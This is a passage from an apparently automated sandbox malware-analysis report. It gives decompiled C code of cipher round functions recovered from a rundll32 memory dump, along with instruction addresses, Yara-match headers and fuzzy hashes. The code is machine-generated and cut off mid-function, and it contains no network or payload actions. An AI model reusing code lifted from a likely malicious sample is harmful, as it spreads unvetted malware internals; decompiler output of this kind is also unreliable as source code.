				r8d =  *(__rdx + 0x50) ^ r11d;
				_t433 = _t432 >> 8;
				_t434 = _t433 >> 0x18;
				_t306 = _t305 ^  *(0x21ef2fe0000 + 0x18de00 + __rcx * 4) -  *((intOrPtr*)(0x21ef2fe0000 + 0x18e200 + _t433 * 4)) +  *((intOrPtr*)(0x21ef2fe0000 + 0x18e600 + _t434 * 4)) ^  *(0x21ef2fe0000 + 0x18ea00 + _t434 * 4);
				asm("rol edx, cl");
				r8d =  *((intOrPtr*)(__rdx + 0x48)) + _t306;
				_t435 = _t434 >> 8;
				_t471 = _t468 >> 0x10 >> 0x10 >> 0x18;
				r11d = r11d ^ ( *(0x21ef2fe0000 + 0x18de00 + __rcx * 4) ^  *(0x21ef2fe0000 + 0x18e200 + _t435 * 4)) +  *((intOrPtr*)(0x21ef2fe0000 + 0x18ea00 + __rcx * 4)) -  *((intOrPtr*)(0x21ef2fe0000 + 0x18e600 + _t471 * 4));
				asm("rol eax, cl");
				r8d =  *((intOrPtr*)(__rdx + 0x40)) - r11d;
				_t437 = _t435 >> 0x10 >> 8;
				_t438 = _t437 >> 0x18;
				_t307 = _t306 ^ ( *(0x21ef2fe0000 + 0x18de00 + __rcx * 4) +  *((intOrPtr*)(0x21ef2fe0000 + 0x18e200 + _t437 * 4)) ^  *(0x21ef2fe0000 + 0x18e600 + _t438 * 4)) -  *((intOrPtr*)(0x21ef2fe0000 + 0x18ea00 + _t438 * 4));
				asm("rol eax, cl");
				r8d =  *(__rdx + 0x38) ^ _t307;
				_t439 = _t438 >> 8;
				_t440 = _t439 >> 0x18;
				r11d = r11d ^  *(0x21ef2fe0000 + 0x18de00 + __rcx * 4) -  *((intOrPtr*)(0x21ef2fe0000 + 0x18e200 + _t439 * 4)) +  *((intOrPtr*)(0x21ef2fe0000 + 0x18e600 + _t440 * 4)) ^  *(0x21ef2fe0000 + 0x18ea00 + _t440 * 4);
				asm("rol edx, cl");
				r8d =  *((intOrPtr*)(__rdx + 0x30)) + r11d;
				_t441 = _t440 >> 8;
				_t474 = _t471 >> 0x10 >> 0x10 >> 0x18;
				_t308 = _t307 ^ ( *(0x21ef2fe0000 + 0x18de00 + __rcx * 4) ^  *(0x21ef2fe0000 + 0x18e200 + _t441 * 4)) +  *((intOrPtr*)(0x21ef2fe0000 + 0x18ea00 + __rcx * 4)) -  *((intOrPtr*)(0x21ef2fe0000 + 0x18e600 + _t474 * 4));
				asm("rol eax, cl");
				r8d =  *((intOrPtr*)(__rdx + 0x28)) - _t308;
				_t443 = _t441 >> 0x10 >> 8;
				_t444 = _t443 >> 0x18;
				r11d = r11d ^ ( *(0x21ef2fe0000 + 0x18de00 + __rcx * 4) +  *((intOrPtr*)(0x21ef2fe0000 + 0x18e200 + _t443 * 4)) ^  *(0x21ef2fe0000 + 0x18e600 + _t444 * 4)) -  *((intOrPtr*)(0x21ef2fe0000 + 0x18ea00 + _t444 * 4));
				asm("rol eax, cl");
				r8d =  *(__rdx + 0x20) ^ r11d;
				_t445 = _t444 >> 8;
				_t446 = _t445 >> 0x18;
				_t309 = _t308 ^  *(0x21ef2fe0000 + 0x18de00 + __rcx * 4) -  *((intOrPtr*)(0x21ef2fe0000 + 0x18e200 + _t445 * 4)) +  *((intOrPtr*)(0x21ef2fe0000 + 0x18e600 + _t446 * 4)) ^  *(0x21ef2fe0000 + 0x18ea00 + _t446 * 4);
				asm("rol edx, cl");
				r8d =  *((intOrPtr*)(__rdx + 0x18)) + _t309;
				_t447 = _t446 >> 8;
				r11d = r11d ^ ( *(0x21ef2fe0000 + 0x18de00 + __rcx * 4) ^  *(0x21ef2fe0000 + 0x18e200 + _t447 * 4)) +  *((intOrPtr*)(0x21ef2fe0000 + 0x18ea00 + __rcx * 4)) -  *((intOrPtr*)(0x21ef2fe0000 + 0x18e600 + (_t474 >> 0x10 >> 0x10 >> 0x18) * 4));
				asm("rol eax, cl");
				r8d =  *((intOrPtr*)(__rdx + 0x10)) - r11d;
				_t449 = _t447 >> 0x10 >> 8;
				_t450 = _t449 >> 0x18;
				_t310 = _t309 ^ ( *(0x21ef2fe0000 + 0x18de00 + __rcx * 4) +  *((intOrPtr*)(0x21ef2fe0000 + 0x18e200 + _t449 * 4)) ^  *(0x21ef2fe0000 + 0x18e600 + _t450 * 4)) -  *((intOrPtr*)(0x21ef2fe0000 + 0x18ea00 + _t450 * 4));
				asm("rol eax, cl");
				r8d =  *(__rdx + 8) ^ _t310;
				_t452 = _t450 >> 8 >> 0x18;
				r11d = r11d ^  *(0x21ef2fe0000 + 0x18de00 + __rcx * 4) +  *((intOrPtr*)(0x21ef2fe0000 + 0x18e600 + _t452 * 4)) -  *((intOrPtr*)(0x21ef2fe0000 + 0x18e200 + _t452 * 4)) ^  *(0x21ef2fe0000 + 0x18ea00 + _t452 * 4);
				asm("rol edx, cl");
				_t453 = _t452 >> 8;
				r9d =  *__rdx + r11d;
				r8d =  *(0x21ef2fe0000 + 0x18de00 + __rcx * 4);
				r10d =  *(0x21ef2fe0000 + 0x18e200 + _t453 * 4);
				r10d = r10d ^ r8d;
				_t454 = _t453 >> 0x18;
				r10d = r10d -  *((intOrPtr*)(0x21ef2fe0000 + 0x18e600 + _t454 * 4));
				r10d = r10d +  *((intOrPtr*)(0x21ef2fe0000 + 0x18ea00 + _t454 * 4));
				r10d = r10d ^ _t310;
				 *__rcx = r10d;
				 *(__rcx + 4) = r11d;
				return r9b & 0xffffffff;
			}







































                                        0x21ef305bb10
                                        0x21ef305bb15
                                        0x21ef305bb1a
                                        0x21ef305bb2d
                                        0x21ef305bb33
                                        0x21ef305bb39
                                        0x21ef305bb3f
                                        0x21ef305bb46
                                        0x21ef305bb49
                                        0x21ef305bb4f
                                        0x21ef305bb5a
                                        0x21ef305bb90
                                        0x21ef305bb96
                                        0x21ef305bb98
                                        0x21ef305bb9b
                                        0x21ef305bbbb
                                        0x21ef305bbd9
                                        0x21ef305bbdd
                                        0x21ef305bbdf
                                        0x21ef305bbec
                                        0x21ef305bc1c
                                        0x21ef305bc26
                                        0x21ef305bc28
                                        0x21ef305bc2d
                                        0x21ef305bc4c
                                        0x21ef305bc62
                                        0x21ef305bc6e
                                        0x21ef305bc70
                                        0x21ef305bc73
                                        0x21ef305bc93
                                        0x21ef305bcb1
                                        0x21ef305bcb7
                                        0x21ef305bcb9
                                        0x21ef305bcbc
                                        0x21ef305bcdc
                                        0x21ef305bcf6
                                        0x21ef305bcfe
                                        0x21ef305bd00
                                        0x21ef305bd05
                                        0x21ef305bd2b
                                        0x21ef305bd42
                                        0x21ef305bd48
                                        0x21ef305bd4a
                                        0x21ef305bd4d
                                        0x21ef305bd6d
                                        0x21ef305bd8b
                                        0x21ef305bd8f
                                        0x21ef305bd91
                                        0x21ef305bd94
                                        0x21ef305bdb0
                                        0x21ef305bdce
                                        0x21ef305bdd8
                                        0x21ef305bdda
                                        0x21ef305bddf
                                        0x21ef305be05
                                        0x21ef305be1c
                                        0x21ef305be20
                                        0x21ef305be22
                                        0x21ef305be25
                                        0x21ef305be45
                                        0x21ef305be63
                                        0x21ef305be69
                                        0x21ef305be6b
                                        0x21ef305be6e
                                        0x21ef305be8e
                                        0x21ef305bea8
                                        0x21ef305beb0
                                        0x21ef305beb2
                                        0x21ef305beb7
                                        0x21ef305bef4
                                        0x21ef305befa
                                        0x21ef305befc
                                        0x21ef305beff
                                        0x21ef305bf1f
                                        0x21ef305bf3d
                                        0x21ef305bf41
                                        0x21ef305bf43
                                        0x21ef305bf50
                                        0x21ef305bf80
                                        0x21ef305bf89
                                        0x21ef305bf8d
                                        0x21ef305bf97
                                        0x21ef305bf9e
                                        0x21ef305bfa6
                                        0x21ef305bfae
                                        0x21ef305bfb3
                                        0x21ef305bfbe
                                        0x21ef305bfcc
                                        0x21ef305bfd4
                                        0x21ef305bfdc
                                        0x21ef305bfdf
                                        0x21ef305bfe8

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b41ee9bc1897a1619e1ee9772c7ef9173bc46fb8038824e0ae975aff062e2510
                                        • Instruction ID: 19e2c2473f859842d30f605558877550438bd258467ee9c2aa3bc6f9625f75c4
                                        • Opcode Fuzzy Hash: b41ee9bc1897a1619e1ee9772c7ef9173bc46fb8038824e0ae975aff062e2510
                                        • Instruction Fuzzy Hash: 88C144722202248BD725CF2DE8C886A77E2F3A9749BC49614FBC697789D53DF504CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3059100 Relevance: .3, Instructions: 296COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0000021E21EF3059100(signed int __rax, unsigned int __rcx, unsigned int __rdx, signed int __r8) {
				unsigned long long _t464;
				unsigned long long _t465;
				unsigned long long _t466;
				unsigned long long _t467;
				unsigned long long _t468;
				unsigned long long _t469;
				unsigned long long _t470;
				unsigned long long _t471;
				unsigned long long _t472;
				unsigned long long _t473;
				unsigned long long _t474;
				unsigned long long _t475;
				unsigned long long _t476;
				unsigned long long _t477;

				r9d =  *(__rdx + 0x44);
				r9d = r9d ^  *__rcx;
				r8d = r9d >> 0x00000010 & 0x000000ff;
				r8d = r8d + 0x100;
				r8d =  *(__rdx + 0x48 + __r8 * 4);
				r8d = r8d +  *((intOrPtr*)(__rdx + 0x48 + (__rdx >> 0x18) * 4));
				r8d = r8d ^  *(__rdx + 0x48 + __rcx * 4);
				r8d = r8d +  *((intOrPtr*)(__rdx + 0x48 + __rax * 4));
				r8d = r8d ^  *(__rdx + 0x40);
				r8d = r8d ^  *(__rcx + 4);
				_t464 = __rcx >> 0x18;
				r9d = r9d ^ ( *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) +  *(__rdx + 0x48 + _t464 * 4) ^  *(__rdx + 0x48 + _t464 * 4)) +  *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) ^  *(__rdx + 0x3c);
				_t465 = _t464 >> 0x18;
				r8d = r8d ^ ( *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) +  *(__rdx + 0x48 + _t465 * 4) ^  *(__rdx + 0x48 + _t465 * 4)) +  *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) ^  *(__rdx + 0x38);
				_t466 = _t465 >> 0x18;
				r9d = r9d ^ ( *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) +  *(__rdx + 0x48 + _t466 * 4) ^  *(__rdx + 0x48 + _t466 * 4)) +  *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) ^  *(__rdx + 0x34);
				_t467 = _t466 >> 0x18;
				r8d = r8d ^ ( *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) +  *(__rdx + 0x48 + _t467 * 4) ^  *(__rdx + 0x48 + _t467 * 4)) +  *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) ^  *(__rdx + 0x30);
				_t468 = _t467 >> 0x18;
				r9d = r9d ^ ( *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) +  *(__rdx + 0x48 + _t468 * 4) ^  *(__rdx + 0x48 + _t468 * 4)) +  *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) ^  *(__rdx + 0x2c);
				_t469 = _t468 >> 0x18;
				r8d = r8d ^ ( *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) +  *(__rdx + 0x48 + _t469 * 4) ^  *(__rdx + 0x48 + _t469 * 4)) +  *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) ^  *(__rdx + 0x28);
				_t470 = _t469 >> 0x18;
				r9d = r9d ^ ( *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) +  *(__rdx + 0x48 + _t470 * 4) ^  *(__rdx + 0x48 + _t470 * 4)) +  *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) ^  *(__rdx + 0x24);
				_t471 = _t470 >> 0x18;
				r8d = r8d ^ ( *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) +  *(__rdx + 0x48 + _t471 * 4) ^  *(__rdx + 0x48 + _t471 * 4)) +  *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) ^  *(__rdx + 0x20);
				_t472 = _t471 >> 0x18;
				r9d = r9d ^ ( *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) +  *(__rdx + 0x48 + _t472 * 4) ^  *(__rdx + 0x48 + _t472 * 4)) +  *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) ^  *(__rdx + 0x1c);
				_t473 = _t472 >> 0x18;
				r8d = r8d ^ ( *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) +  *(__rdx + 0x48 + _t473 * 4) ^  *(__rdx + 0x48 + _t473 * 4)) +  *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) ^  *(__rdx + 0x18);
				_t474 = _t473 >> 0x18;
				r9d = r9d ^ ( *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) +  *(__rdx + 0x48 + _t474 * 4) ^  *(__rdx + 0x48 + _t474 * 4)) +  *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) ^  *(__rdx + 0x14);
				_t475 = _t474 >> 0x18;
				r8d = r8d ^ ( *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) +  *(__rdx + 0x48 + _t475 * 4) ^  *(__rdx + 0x48 + _t475 * 4)) +  *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) ^  *(__rdx + 0x10);
				_t476 = _t475 >> 0x18;
				r9d = r9d ^ ( *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) +  *(__rdx + 0x48 + _t476 * 4) ^  *(__rdx + 0x48 + _t476 * 4)) +  *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) ^  *(__rdx + 0xc);
				_t477 = _t476 >> 0x18;
				r8d = r8d ^ ( *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) +  *(__rdx + 0x48 + _t477 * 4) ^  *(__rdx + 0x48 + _t477 * 4)) +  *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) ^  *(__rdx + 8);
				r8d = r8d ^  *__rdx;
				r9d = r9d ^ ( *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) +  *(__rdx + 0x48 + (_t477 >> 0x18) * 4) ^  *(__rdx + 0x48 + (_t477 >> 0x18) * 4)) +  *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) ^  *(__rdx + 4);
				 *__rcx = r8d;
				 *(__rcx + 4) = r9d;
				return (r8b & 0xffffffff) + 0x300;
			}

















                                        0x21ef3059100
                                        0x21ef3059107
                                        0x21ef3059116
                                        0x21ef3059120
                                        0x21ef3059138
                                        0x21ef3059142
                                        0x21ef3059147
                                        0x21ef305914c
                                        0x21ef3059151
                                        0x21ef3059155
                                        0x21ef305916a
                                        0x21ef305919e
                                        0x21ef30591b2
                                        0x21ef30591e6
                                        0x21ef30591fa
                                        0x21ef305922e
                                        0x21ef305924d
                                        0x21ef3059276
                                        0x21ef305928a
                                        0x21ef30592be
                                        0x21ef30592d2
                                        0x21ef3059306
                                        0x21ef305931a
                                        0x21ef305934e
                                        0x21ef3059362
                                        0x21ef3059396
                                        0x21ef30593aa
                                        0x21ef30593de
                                        0x21ef30593f2
                                        0x21ef3059426
                                        0x21ef305943a
                                        0x21ef305946e
                                        0x21ef3059482
                                        0x21ef30594b6
                                        0x21ef30594d5
                                        0x21ef30594fe
                                        0x21ef3059512
                                        0x21ef3059546
                                        0x21ef305957b
                                        0x21ef3059591
                                        0x21ef3059594
                                        0x21ef3059597
                                        0x21ef305959b

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 582a7e91ac43e1a01a7d7da354588a3fd39a363a2ea9105f9677cafbafe65974
                                        • Instruction ID: 90716a120d76e616e9456c75875a24cacf7da7ca8ee00a1b0e639c8d2846dcb9
                                        • Opcode Fuzzy Hash: 582a7e91ac43e1a01a7d7da354588a3fd39a363a2ea9105f9677cafbafe65974
                                        • Instruction Fuzzy Hash: 08C1BCB662142847E384C71EC899F2933A9D799346F879219E381CBBC9E13FE54587D0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF30595A0 Relevance: .3, Instructions: 296COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0000021E21EF30595A0(signed int __rax, unsigned int __rcx, unsigned int __rdx, signed int __r8) {
				unsigned long long _t464;
				unsigned long long _t465;
				unsigned long long _t466;
				unsigned long long _t467;
				unsigned long long _t468;
				unsigned long long _t469;
				unsigned long long _t470;
				unsigned long long _t471;
				unsigned long long _t472;
				unsigned long long _t473;
				unsigned long long _t474;
				unsigned long long _t475;
				unsigned long long _t476;
				unsigned long long _t477;

				r9d =  *__rcx;
				r9d = r9d ^  *__rdx;
				r8d = r9d >> 0x00000010 & 0x000000ff;
				r8d = r8d + 0x100;
				r8d =  *(__rdx + 0x48 + __r8 * 4);
				r8d = r8d +  *((intOrPtr*)(__rdx + 0x48 + (__rdx >> 0x18) * 4));
				r8d = r8d ^  *(__rdx + 0x48 + __rcx * 4);
				r8d = r8d +  *((intOrPtr*)(__rdx + 0x48 + __rax * 4));
				r8d = r8d ^  *(__rdx + 4);
				r8d = r8d ^  *(__rcx + 4);
				_t464 = __rcx >> 0x18;
				r9d = r9d ^ ( *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) +  *(__rdx + 0x48 + _t464 * 4) ^  *(__rdx + 0x48 + _t464 * 4)) +  *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) ^  *(__rdx + 8);
				_t465 = _t464 >> 0x18;
				r8d = r8d ^ ( *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) +  *(__rdx + 0x48 + _t465 * 4) ^  *(__rdx + 0x48 + _t465 * 4)) +  *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) ^  *(__rdx + 0xc);
				_t466 = _t465 >> 0x18;
				r9d = r9d ^ ( *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) +  *(__rdx + 0x48 + _t466 * 4) ^  *(__rdx + 0x48 + _t466 * 4)) +  *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) ^  *(__rdx + 0x10);
				_t467 = _t466 >> 0x18;
				r8d = r8d ^ ( *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) +  *(__rdx + 0x48 + _t467 * 4) ^  *(__rdx + 0x48 + _t467 * 4)) +  *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) ^  *(__rdx + 0x14);
				_t468 = _t467 >> 0x18;
				r9d = r9d ^ ( *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) +  *(__rdx + 0x48 + _t468 * 4) ^  *(__rdx + 0x48 + _t468 * 4)) +  *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) ^  *(__rdx + 0x18);
				_t469 = _t468 >> 0x18;
				r8d = r8d ^ ( *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) +  *(__rdx + 0x48 + _t469 * 4) ^  *(__rdx + 0x48 + _t469 * 4)) +  *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) ^  *(__rdx + 0x1c);
				_t470 = _t469 >> 0x18;
				r9d = r9d ^ ( *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) +  *(__rdx + 0x48 + _t470 * 4) ^  *(__rdx + 0x48 + _t470 * 4)) +  *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) ^  *(__rdx + 0x20);
				_t471 = _t470 >> 0x18;
				r8d = r8d ^ ( *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) +  *(__rdx + 0x48 + _t471 * 4) ^  *(__rdx + 0x48 + _t471 * 4)) +  *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) ^  *(__rdx + 0x24);
				_t472 = _t471 >> 0x18;
				r9d = r9d ^ ( *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) +  *(__rdx + 0x48 + _t472 * 4) ^  *(__rdx + 0x48 + _t472 * 4)) +  *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) ^  *(__rdx + 0x28);
				_t473 = _t472 >> 0x18;
				r8d = r8d ^ ( *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) +  *(__rdx + 0x48 + _t473 * 4) ^  *(__rdx + 0x48 + _t473 * 4)) +  *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) ^  *(__rdx + 0x2c);
				_t474 = _t473 >> 0x18;
				r9d = r9d ^ ( *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) +  *(__rdx + 0x48 + _t474 * 4) ^  *(__rdx + 0x48 + _t474 * 4)) +  *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) ^  *(__rdx + 0x30);
				_t475 = _t474 >> 0x18;
				r8d = r8d ^ ( *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) +  *(__rdx + 0x48 + _t475 * 4) ^  *(__rdx + 0x48 + _t475 * 4)) +  *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) ^  *(__rdx + 0x34);
				_t476 = _t475 >> 0x18;
				r9d = r9d ^ ( *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) +  *(__rdx + 0x48 + _t476 * 4) ^  *(__rdx + 0x48 + _t476 * 4)) +  *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) ^  *(__rdx + 0x38);
				_t477 = _t476 >> 0x18;
				r8d = r8d ^ ( *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) +  *(__rdx + 0x48 + _t477 * 4) ^  *(__rdx + 0x48 + _t477 * 4)) +  *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) ^  *(__rdx + 0x3c);
				r8d = r8d ^  *(__rdx + 0x44);
				r9d = r9d ^ ( *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) +  *(__rdx + 0x48 + (_t477 >> 0x18) * 4) ^  *(__rdx + 0x48 + (_t477 >> 0x18) * 4)) +  *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) ^  *(__rdx + 0x40);
				 *__rcx = r8d;
				 *(__rcx + 4) = r9d;
				return (r8b & 0xffffffff) + 0x300;
			}

















                                        0x21ef30595a0
                                        0x21ef30595a6
                                        0x21ef30595b5
                                        0x21ef30595bf
                                        0x21ef30595d7
                                        0x21ef30595e1
                                        0x21ef30595e6
                                        0x21ef30595eb
                                        0x21ef30595f0
                                        0x21ef30595f4
                                        0x21ef3059609
                                        0x21ef305963d
                                        0x21ef3059651
                                        0x21ef3059685
                                        0x21ef3059699
                                        0x21ef30596cd
                                        0x21ef30596ec
                                        0x21ef3059715
                                        0x21ef3059729
                                        0x21ef305975d
                                        0x21ef3059771
                                        0x21ef30597a5
                                        0x21ef30597b9
                                        0x21ef30597ed
                                        0x21ef3059801
                                        0x21ef3059835
                                        0x21ef3059849
                                        0x21ef305987d
                                        0x21ef3059891
                                        0x21ef30598c5
                                        0x21ef30598d9
                                        0x21ef305990d
                                        0x21ef3059921
                                        0x21ef3059955
                                        0x21ef3059974
                                        0x21ef305999d
                                        0x21ef30599b1
                                        0x21ef30599e5
                                        0x21ef3059a1a
                                        0x21ef3059a31
                                        0x21ef3059a34
                                        0x21ef3059a37
                                        0x21ef3059a3b

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 56b82af931801861401d1af032a20993c7c18475d91a9b4644bb39ff2e37f13e
                                        • Instruction ID: f178bc895364f4174293084b2c4f12d974863cb1f72a57913042451f8509f8ba
                                        • Opcode Fuzzy Hash: 56b82af931801861401d1af032a20993c7c18475d91a9b4644bb39ff2e37f13e
                                        • Instruction Fuzzy Hash: 27C1BDB662142847E384C71EC899F2933A9D799346F879219E381CBBC9E13FE54587D0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF305BFF0 Relevance: .3, Instructions: 293COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 78%
                                        			E0000021E21EF305BFF0(unsigned int __rax, long long __rbx, signed int __rcx, signed int* __rdx, long long __rdi, long long __rsi, unsigned int __r8, unsigned int __r9, long long _a8, long long _a16, long long _a24) {
				unsigned long long _t412;
				signed long long _t414;
				unsigned long long _t415;
				signed long long _t416;
				unsigned long long _t417;
				unsigned long long _t418;
				signed long long _t420;
				unsigned long long _t421;
				signed long long _t422;
				unsigned long long _t423;
				unsigned long long _t424;
				signed long long _t426;
				unsigned long long _t427;
				signed long long _t428;
				unsigned long long _t429;
				unsigned long long _t430;
				signed long long _t432;
				unsigned long long _t433;
				signed long long _t434;
				unsigned long long _t435;
				unsigned long long _t436;
				unsigned long long _t439;
				signed long long _t440;
				unsigned long long _t441;
				unsigned long long _t458;
				unsigned long long _t461;
				unsigned long long _t464;
				unsigned long long _t467;

				_a8 = __rbx;
				_a16 = __rsi;
				_a24 = __rdi;
				r8d =  *__rdx;
				r11d =  *(__rcx + 4);
				r8d = r8d + r11d;
				asm("inc ecx");
				r9d = r8d;
				_t412 = __rax >> 8;
				r8d = r8d & 0x000000ff;
				r10d =  *(0x21ef2fe0000 + 0x18de00 + __r8 * 4);
				r10d = r10d ^  *(0x21ef2fe0000 + 0x18e200 + _t412 * 4);
				r10d = r10d +  *((intOrPtr*)(0x21ef2fe0000 + 0x18ea00 + __rcx * 4));
				r10d = r10d -  *((intOrPtr*)(0x21ef2fe0000 + 0x18e600 + (__r9 >> 0x18) * 4));
				r10d = r10d ^  *__rcx;
				asm("rol eax, cl");
				r8d = __rdx[2] ^ r10d;
				_t414 = _t412 >> 0x10 >> 8;
				_t415 = _t414 >> 0x18;
				r11d = r11d ^  *(0x21ef2fe0000 + 0x18de00 + __rcx * 4) -  *((intOrPtr*)(0x21ef2fe0000 + 0x18e200 + _t414 * 4)) +  *((intOrPtr*)(0x21ef2fe0000 + 0x18e600 + _t415 * 4)) ^  *(0x21ef2fe0000 + 0x18ea00 + _t415 * 4);
				asm("rol eax, cl");
				r8d = __rdx[4] - r11d;
				_t416 = _t415 >> 8;
				_t417 = _t416 >> 0x18;
				r10d = r10d ^ ( *(0x21ef2fe0000 + 0x18de00 + __rcx * 4) +  *((intOrPtr*)(0x21ef2fe0000 + 0x18e200 + _t416 * 4)) ^  *(0x21ef2fe0000 + 0x18e600 + _t417 * 4)) -  *((intOrPtr*)(0x21ef2fe0000 + 0x18ea00 + _t417 * 4));
				asm("rol edx, cl");
				r8d = __rdx[6] + r10d;
				_t418 = _t417 >> 8;
				_t458 = __r8 >> 0x10 >> 0x10 >> 0x18;
				r11d = r11d ^ ( *(0x21ef2fe0000 + 0x18de00 + __rcx * 4) ^  *(0x21ef2fe0000 + 0x18e200 + _t418 * 4)) +  *((intOrPtr*)(0x21ef2fe0000 + 0x18ea00 + __rcx * 4)) -  *((intOrPtr*)(0x21ef2fe0000 + 0x18e600 + _t458 * 4));
				asm("rol eax, cl");
				r8d = __rdx[8] ^ r11d;
				_t420 = _t418 >> 0x10 >> 8;
				_t421 = _t420 >> 0x18;
				r10d = r10d ^  *(0x21ef2fe0000 + 0x18de00 + __rcx * 4) -  *((intOrPtr*)(0x21ef2fe0000 + 0x18e200 + _t420 * 4)) +  *((intOrPtr*)(0x21ef2fe0000 + 0x18e600 + _t421 * 4)) ^  *(0x21ef2fe0000 + 0x18ea00 + _t421 * 4);
				asm("rol eax, cl");
				r8d = __rdx[0xa] - r10d;
				_t422 = _t421 >> 8;
				_t423 = _t422 >> 0x18;
				r11d = r11d ^ ( *(0x21ef2fe0000 + 0x18de00 + __rcx * 4) +  *((intOrPtr*)(0x21ef2fe0000 + 0x18e200 + _t422 * 4)) ^  *(0x21ef2fe0000 + 0x18e600 + _t423 * 4)) -  *((intOrPtr*)(0x21ef2fe0000 + 0x18ea00 + _t423 * 4));
				asm("rol edx, cl");
				r8d = __rdx[0xc] + r11d;
				_t424 = _t423 >> 8;
				_t461 = _t458 >> 0x10 >> 0x10 >> 0x18;
				r10d = r10d ^ ( *(0x21ef2fe0000 + 0x18de00 + __rcx * 4) ^  *(0x21ef2fe0000 + 0x18e200 + _t424 * 4)) +  *((intOrPtr*)(0x21ef2fe0000 + 0x18ea00 + __rcx * 4)) -  *((intOrPtr*)(0x21ef2fe0000 + 0x18e600 + _t461 * 4));
				asm("rol eax, cl");
				r8d = __rdx[0xe] ^ r10d;
				_t426 = _t424 >> 0x10 >> 8;
				_t427 = _t426 >> 0x18;
				r11d = r11d ^  *(0x21ef2fe0000 + 0x18de00 + __rcx * 4) -  *((intOrPtr*)(0x21ef2fe0000 + 0x18e200 + _t426 * 4)) +  *((intOrPtr*)(0x21ef2fe0000 + 0x18e600 + _t427 * 4)) ^  *(0x21ef2fe0000 + 0x18ea00 + _t427 * 4);
				asm("rol eax, cl");
				r8d = __rdx[0x10] - r11d;
				_t428 = _t427 >> 8;
				_t429 = _t428 >> 0x18;
